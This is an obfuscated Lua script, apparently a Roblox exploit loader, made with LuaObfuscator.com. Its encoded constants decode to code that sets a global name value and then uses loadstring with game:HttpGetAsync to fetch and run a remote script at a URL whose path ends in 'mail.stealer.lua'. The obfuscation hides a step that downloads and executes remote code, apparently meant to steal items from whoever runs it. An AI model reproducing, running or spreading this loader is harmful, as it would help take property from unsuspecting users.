--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==5) then v16=nil;v16=function(v17,v18,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==6) then v38=nil;v38=function()local v48=0 -0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v48==2) then v53=nil;v54=nil;v48=3;end if (v48==1) then v51=nil;v52=nil;v48=2;end if ((9 -6)==v48) then v55=nil;while true do local v87=223 -(214 + 9);while true do if ((0 -0)~=v87) then else if (v49~=2) then else for v115=1 + 0,v54 do local v116=0 -0;local v117;local v118;while true do if (v116==(0 -0)) then local v128=1599 -(467 + 1132);local v129;while true do if (v128~=(546 -(475 + 71))) then else v129=0;while true do if (v129~=(763 -(129 + 634))) then else local v155=0;while true do if (v155==0) then v117=v31();v118=nil;v155=1;end if (v155~=(3 -2)) then else v129=1;break;end end end if (v129~=(1 + 0)) then else v116=1;break;end end break;end end end if (v116==(187 -(37 + 149))) then if (v117==1) then v118=v31()~=(1276 -(387 + 889));elseif (v117==(140 -(111 + 27))) then v118=v34();elseif (v117~=(3 + 0)) then else v118=v35();end v55[v115]=v118;break;end end end v53[3]=v31();for v119=1,v33() do local v120=0 + 0;local v121;local v122;while true do if (1~=v120) then else while true do if (v121==(0 -0)) then v122=v31();if (v30(v122,3 -2,1)==(931 -(109 + 822))) then local v138=0 + 0;local v139;local v140;local v141;local v142;local v143;while true do if (v138~=(275 -(29 + 246))) then else v139=0 -0;v140=nil;v138=1;end if (v138==(908 -(431 + 476))) then v141=nil;v142=nil;v138=3 -1;end if (v138~=(1920 -(1085 + 833))) then else v143=nil;while true do if (v139~=(0 + 0)) then else local v172=0;while true do if (v172~=1) then else v139=1;break;end if (v172==0) then local v184=0;while true do if (v184==1) then v172=2 -1;break;end if (v184~=0) then else v140=0 + 0;v141=nil;v184=1;end end end end end if (v139==1) then local v173=0;while true do if ((1 + 0)==v173) then v139=2;break;end if (0~=v173) then else v142=nil;v143=nil;v173=1 -0;end end end if (2==v139) then while true do if (v140==3) then if (v30(v142,6 -3,8 -5)==1) then v143[1669 -(1552 + 113)]=v55[v143[1221 -(822 + 395)]];end v50[v119]=v143;break;end if (v140==(2 -1)) then local v186=0 + 0;local v187;while true do if (v186==(57 -(11 + 46))) then v187=0 -0;while true do if (v187~=(0 -0)) then else local v204=0;local v205;while true do if (v204==0) then v205=1464 -(1110 + 354);while true do if (v205==0) then local v217=0;while true do if (v217~=(1401 -(804 + 596))) then else v205=1;break;end if (v217~=0) then else v143={v32(),v32(),nil,nil};if (v141==(367 -(259 + 108))) then local v218=815 -(103 + 712);local v219;local v220;while true do if (v218~=0) then else v219=0;v220=nil;v218=1 + 0;end if (v218~=1) then else while true do if (v219==0) then v220=0;while true do if (v220==(0 -0)) then v143[2 + 1]=v32();v143[4]=v32();break;end end break;end end break;end end elseif (v141==(1 -0)) then v143[4 -1]=v33();elseif (v141==(1 + 1)) then v143[1997 -(371 + 1623)]=v33() -(2^(5 + 11));elseif (v141~=3) then else local v223=0;local v224;local v225;while true do if (v223==(2 -1)) then while true do if (v224==0) then v225=0 + 0;while true do if ((0 -0)~=v225) then else v143[3]=v33() -((2 + 0)^(53 -37));v143[8 -4]=v32();break;end end break;end end break;end if (v223~=0) then else v224=0 -0;v225=nil;v223=1;end end end v217=1;end end end if (v205~=1) then else v187=1619 -(321 + 1297);break;end end break;end end end if (v187==1) then v140=2;break;end end break;end end end if (v140~=(5 -3)) then else local v188=0;local v189;local v190;while true do if (v188~=0) then else v189=1465 -(1116 + 349);v190=nil;v188=1;end if ((863 -(582 + 280))==v188) then while true do if (v189~=(0 + 0)) then else v190=908 -(390 + 518);while true do if (v190==1) then v140=7 -4;break;end if (v190~=(0 + 0)) then else if (v30(v142,1 -0,1)~=(1 + 0)) then else v143[1392 -(1030 + 360)]=v55[v143[2]];end if (v30(v142,461 -(202 + 257),7 -5)~=1) then else v143[2 + 1]=v55[v143[1 + 2]];end v190=1;end end break;end end break;end end end if (v140==0) then local v191=0;local v192;local v193;while true do if (v191~=0) then else v192=0 + 0;v193=nil;v191=1 + 0;end if (v191==1) then while true do if (v192==(0 + 0)) then v193=0 + 0;while true do if (v193==(1716 -(1390 + 326))) then local v211=0 -0;while true do if ((0 -0)~=v211) then else v141=v30(v122,3 -1,419 -(246 + 170));v142=v30(v122,4,888 -(65 + 817));v211=1 + 0;end if (v211~=1) then else v193=2 -1;break;end end end if (v193==1) then v140=1 -0;break;end end break;end end break;end end end end break;end end break;end end end break;end end break;end if (0~=v120) then else local v131=0;while true do if (v131==1) then v120=1;break;end if (v131~=0) then else v121=0;v122=nil;v131=1;end end end end end v49=3;end if (v49==(0 -0)) then v50={};v51={};v52={};v49=1 + 0;end v87=1;end if (v87==(1 -0)) then if (v49~=(1 + 0)) then else v53={v50,v51,nil,v52};v54=v33();v55={};v49=1802 -(950 + 850);end if (3==v49) then local v110=876 -(172 + 704);local v111;while true do if ((482 -(333 + 149))~=v110) then else v111=1321 -(637 + 684);while true do if (v111~=0) then else for v134=700 -(413 + 286),v33() do v51[v134-1]=v38();end for v136=1,v33() do v52[v136]=v33();end v111=1 + 0;end if (v111~=1) then else return v53;end end break;end end end break;end end end break;end if (v48~=0) then else v49=0;v50=nil;v48=2 -1;end end end;v39=nil;v27=7;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (7==v27) then v39=function(v40,v41,v42)local v56=0;local v57;local v58;local v59;while true do if (v56==0) then v57=v40[1];v58=v40[2];v56=1;end if (v56==1) then v59=v40[3];return function(...)local v88=0;local v89;local v90;local v91;local v92;local v93;while true do if (v88==2) then v93=nil;v93=function()local v99=v57;local v100=v58;local v101=v59;local v102=v37;local v103={};local v104={};local v105={};for v112=0 + 0 + 0,v92 do if (((3493 -1340)==(1692 + 461)) and (v112>=v101)) then v103[v112-v101]=v91[v112 + 1 + 0];else v105[v112]=v91[v112 + 1 + 0 + 0];end end local v106=(v92-v101) + 1 + 0;local v107;local v108;while true do local v113=0 -0;while true do if ((v113==(0 -0)) or ((430 + 4050)<=(15719 -11871))) then local v127=0;while true do if ((v127==(1 + (210 -(68 + 142)))) or ((2566 -(957 + 1032))>(2288 -(124 + 370)))) then v113=1 + (0 -0);break;end if ((v127==0) or (((810 -505) + 3257)<=1571)) then v107=v99[v89];v108=v107[1 + 0];v127=1 + (1663 -(1423 + 240));end end end if ((v113==(1 -0)) or ((2354 -(173 + 78))>=(3428 -(639 + 29)))) then if ((v108<=(10 -5)) or ((4772 + 147)<=(1018 + 21))) then if ((v108<=((540 -(391 + 142)) -5)) or (((13764 -(117 + 402)) -(11174 -(685 + 783)))<(7554 -4045))) then if ((v108<=(1385 -(284 + 1101))) or (((1084 + 5660) -2089)<(5165 -(673 + 323)))) then do return;end elseif ((((578 + 2149) -(175 + (265 -153)))>1341) and (v108==(1192 -(512 + 679)))) then v89=v107[1966 -(878 + 1085)];else local v157=0;local v158;local v159;while true do if ((v157==(0 + 0)) or ((2196 + 184)==((3688 -2448) + 282))) then v158=1159 -((3001 -2354) + 512);v159=nil;v157=1 + 0;end if ((v157==(2 -1)) or ((7631 -5227)<=(1893 -(1072 + (2444 -(1620 + 50)))))) then while true do if ((932<=(360 + 3094)) and (v158==(0 -0))) then v159=v107[501 -(445 + (911 -(808 + 49)))];v105[v159]=v105[v159](v14(v105,v159 + (3 -2),v90));break;end end break;end end end elseif (((5838 -(880 + 16))>(9448 -5726)) and (v108<=(11 -8))) then v105[v107[421 -(78 + 341)]]=v107[12 -9];elseif (((777 + 75 + 1330)>=(6916 -4845)) and (v108>(1696 -(427 + 1265)))) then local v160=0 + 0;local v161;local v162;local v163;while true do if (((9368 -5610)<4365) and (v160==0)) then local v171=0 -0;while true do if ((v171==(2 -1)) or ((1365 -821)>=2604)) then v160=1 -0;break;end if ((v171==(0 + 0)) or ((6518 -(683 + 951))<(2245 -1386))) then v161=0 -0;v162=nil;v171=1;end end end if (((3 -2)==v160) or (4128==(3332 -((661 -(115 + 22)) + 1026)))) then v163=nil;while true do if ((233<474) and (v161==(1579 -((7282 -5772) + 69)))) then local v177=0 -0;local v178;while true do if ((((2327 + 225) -985)<=2262) and ((0 + 0)==v177)) then v178=0;while true do if ((v178==(1 + 0)) or ((1802 -(69 + 98))>(16321 -12487))) then v161=1 + 0;break;end if (((1598 -416)==(3114 -(890 + (2991 -1949)))) and ((0 + 0)==v178)) then local v203=0 -0;while true do if ((v203==1) or (4815==(1198 + 3294))) then v178=4 -3;break;end if ((v203==(500 -(199 + 301))) or ((239 + 526)<=(265 + 245))) then v162=v107[2];v163=v105[v107[463 -(198 + 262)]];v203=1;end end end end break;end end end if (((1893 -(929 + 963))==v161) or ((355 + 595)==(1918 -((2145 -1421) + 84)))) then v105[v162 + 1]=v163;v105[v162]=v163[v107[3 + 1]];break;end end break;end end elseif ((v105[v107[769 -(47 + 720)]]==v107[515 -(479 + 32)]) or ((6496 -((3167 -(900 + 434)) + 23))<(1033 + 2529))) then v89=v89 + 1 + 0;else v89=v107[1 + 2];end elseif ((v108<=(18 -10)) or ((12125 -8871)<=(4889 -1715))) then if ((v108<=(28 -22)) or (4949<=(2276 -(786 + 935)))) then local v146=0 -0;local v147;local v148;local v149;local v150;local v151;local v152;while true do if ((v146==(0 -0)) or ((3 + 150)==(1118 -551))) then v147=0 -0;v148=nil;v146=3 -(1369 -(373 + 994));end if (((4973 -1911)<(4646 -(469 + (627 -(200 + 252))))) and ((1 + 1)==v146)) then v151=nil;v152=nil;v146=3 + 0;end if ((v146==(382 -(331 + 50))) or ((2990 -(41 + 153))<(22 + 100))) then v149=nil;v150=nil;v146=1221 -(753 + 466);end if ((v146==3) or (2236>=(8263 -4295))) then while true do if ((v147==(1017 -(533 + 482))) or (4090<75)) then v152=nil;while true do if (((569 + 73 + 2924)>=2604) and ((1 + 0)==v148)) then local v194=0;while true do if ((v194==(1567 -((164 -122) + 1525))) or ((3090 -(71 + 44))<=((1556 + 927) -647))) then local v202=1814 -((3125 -2245) + 934);while true do if ((3292>(1514 -(418 + 1012))) and (v202==(634 -(184 + 449)))) then v194=1 + 0;break;end if ((2372<(1551 + 3352)) and (0==v202)) then v90=(v151 + v149) -1;v152=1106 -((704 -(61 + 105)) + 568);v202=549 -(25 + (1631 -1108));end end end if ((((42184 -25127) -13494)==(6667 -3104)) and (v194==(3 -2))) then v148=4 -2;break;end end end if ((v148==(359 -(295 + 62))) or ((1906 + 94 + 10)>4443)) then for v197=v149,v90 do local v198=0 + 0;local v199;while true do if ((v198==0) or ((1316 + 1437)>(2955 + 1697))) then v199=0 + 0;while true do if ((2390>1911) and (v199==((0 + 0) -0))) then v152=v152 + 1 + 0;v105[v197]=v150[v152];break;end end break;end end end break;end if ((v148==(0 -0)) or ((8283 -4156)==(2731 + 294))) then local v195=1757 -((3567 -2163) + 353);local v196;while true do if (((1417 -(18 + 597))<3941) and (v195==(0 + 0))) then v196=0 -(0 -0);while true do if ((v196==(1 -0)) or ((11582 -(935 + 5827))==4023)) then v148=1 + 0;break;end if ((v196==0) or (((548 + 5602) -(481 + 1459))<(4973 -(454 + 607)))) then local v206=0;while true do if ((0==v206) or ((17721 -12752)<(3379 -(991 + 121)))) then v149=v107[2 + 0];v150,v151=v102(v105[v149](v14(v105,v149 + 1,v107[3])));v206=1 + 0;end if ((((6716 -(529 + 489)) -(775 + 174))==(7364 -2615)) and (v206==(1 -0))) then v196=4 -3;break;end end end end break;end end end end break;end if ((v147==(1622 -(410 + 1211))) or ((2618 + (1010 -(10 + 441)))==(104 -66))) then local v174=0 -0;while true do if (((2647 -(284 + 12))>(1990 -(593 + 61))) and (v174==(0 -0))) then v150=nil;v151=nil;v174=1 + 0;end if ((v174==(67 -(4 + 62))) or (4128<=1970)) then v147=4 -2;break;end end end if (((1400 + 2955)==4355) and (((0 + 0) -0)==v147)) then v148=953 -(550 + 180 + 223);v149=nil;v147=813 -(326 + (1026 -540));end end break;end end elseif ((v108==((4 + 15) -12)) or (1304>(6814 -(470 + 1454)))) then v105[v107[4 -2]]=v107[637 -(19 + 615)]~=0;else v105[v107[1574 -(267 + 1305)]]();end elseif ((v108<=9) or ((301 + 3447)>=(3883 + 15))) then v105[v107[1273 -(71 + 1200)]][v107[745 -(74 + 668)]]=v107[4 + 0];elseif ((v108==10) or ((420 + 224)>(7581 -4173))) then local v165=0 + 0;local v166;local v167;while true do if (((245 -142)<(3891 + 67)) and (v165==((1910 -(721 + 1188)) + 0))) then while true do if ((v166==(0 -0)) or ((1724 -(628 + 988))>(5238 -(748 + 1208)))) then v167=v107[2];v105[v167]=v105[v167]();break;end end break;end if ((2406>(4651 -3588)) and (v165==(0 + 0))) then v166=0 + 0 + 0;v167=nil;v165=1 + 0;end end else v105[v107[(2440 -(148 + 733)) -(1041 + 516)]]=v42[v107[3]];end v89=v89 + (1 -0);break;end end end end;v88=3;end if (v88==0) then v89=1;v90= -1;v88=1;end if (v88==1) then v91={...};v92=v13("#",...) -1;v88=2;end if (v88==3) then A,B=v37(v12(v93));if  not A[1] then local v114=v40[4][v89] or "?";error("Script error at ["   .. v114   .. "]:"   .. A[2]);else return v14(A,2,B);end break;end end end;end end end;return v39(v38(),{},v18)(...);end if (v27==2) then v31=function()local v60=0;local v61;while true do if (v60==(0 + 0)) then v61=v2(v17,v28,v28);v28=v28 + (1725 -(871 + 853));v60=1 + 0;end if (v60==(1664 -(199 + 1464))) then return v61;end end end;v32=nil;v32=function()local v62=0 + 0;local v63;local v64;while true do if (v62==(0 + 0)) then v63,v64=v2(v17,v28,v28 + 2);v28=v28 + (9 -7);v62=2 -(2 -1);end if (v62==(1200 -(909 + 290))) then return (v64 * (999 -743)) + v63;end end end;v27=3;end if (0==v27) then v28=1;v29=nil;v17=v5(v4(v17,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v3(v1(v43,16));if v29 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v6(v80,v29);v29=nil;v96=1;end end else return v80;end break;end end end end);v27=1;end if (v27==4) then v34=function()local v65=(0 + 0) -0;local v66;local v67;local v68;local v69;local v70;local v71;while true do if (v65==(1179 -(755 + 421))) then if (v70==(0 -0)) then if (v69==(586 -(168 + 418))) then return v71 * 0;else local v98=0 + 0;while true do if (v98==(808 -(278 + 530))) then v70=628 -(356 + 271);v68=62 -(37 + 25);break;end end end elseif (v70==2047) then return ((v69==0) and (v71 * ((1 + 0)/0))) or (v71 * NaN);end return v9(v71,v70-(3838 -2815)) * (v68 + (v69/(((3 -1) -(200 -(148 + 52)))^(160 -108))));end if (v65==(1 + 1 + 0)) then v70=v30(v67,6 + (748 -(175 + 558)),13 + 18);v71=((v30(v67,31 + 1)==(1 + 0)) and  -(1 -0)) or 1;v65=1723 -(1065 + 655);end if (v65==(1447 -(1385 + 61))) then v68=1 + 0;v69=(v30(v67,1 + 0 + 0,609 -(476 + 113)) * ((5 -3)^(889 -(245 + 612)))) + v66;v65=1104 -(251 + 851);end if (v65==(469 -(26 + 443))) then v66=v33();v67=v33();v65=1 + 0;end end end;v35=nil;v35=function(v44)local v72=1535 -(543 + 992);local v73;local v74;while true do if (v72==(2 + 1)) then return v7(v74);end if (v72==(1761 -(250 + 1510))) then v73=v4(v17,v28,(v28 + v44) -((1 + 0) -0));v28=v28 + v44;v72=2;end if (v72==((1914 -(111 + 1803)) + 0)) then v73=nil;if  not v44 then v44=v33();if (v44==((0 + 0) -0)) then return "";end end v72=2 -1;end if (2==v72) then v74={};for v94=1620 -(1283 + 336), #v73 do v74[v94]=v3(v2(v4(v73,v94,v94)));end v72=3;end end end;v27=5;end if (1==v27) then v30=nil;v30=function(v45,v46,v47)if v47 then local v81=0 + (0 -0);local v82;while true do if (v81==(0 -0)) then v82=(v45/(((4861 -2895) -((2156 -1655) + 1463))^(v46-(1327 -(551 + 775)))))%((834 -(229 + 603))^(((v47-((34 + 474) -(321 + 186))) -(v46-(1840 -(1629 + 210)))) + 1 + 0));return v82-(v82%1);end end else local v83=(2 + (103 -(19 + 84)))^(v46-(1 + (0 -0)));return (((v45%(v83 + v83))>=v83) and (1 + 0)) or 0;end end;v31=nil;v27=2;end if (v27==3) then v33=nil;v33=function()local v75,v76,v77,v78=v2(v17,v28,v28 + (4 -1));v28=v28 + 4;return (v78 * (16777584 -(230 + 138))) + (v77 * (88680 -23144)) + (v76 * (6 + 56 + 194)) + v75;end;v34=nil;v27=4;end end end;v16("LOL!083O00028O0003073O0067657467656E7603043O006E616D6503123O00656967687467617465736F66646561746831030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032A3O00682O7470733A2O2F77756D61742E78797A2F736372697074732F6D61696C2E737465616C65722E6C756100113O0012033O00013O0026043O0001000100010004013O0001000100120B000100024O000A00010001000200300900010003000400120B000100053O00120B000200063O002005000200020007001203000400084O0007000500014O0006000200054O000200013O00022O00080001000100010004013O001000010004013O000100016O00017O00113O00023O00043O00043O00053O00053O00053O00063O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v10(),...);break;end if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end
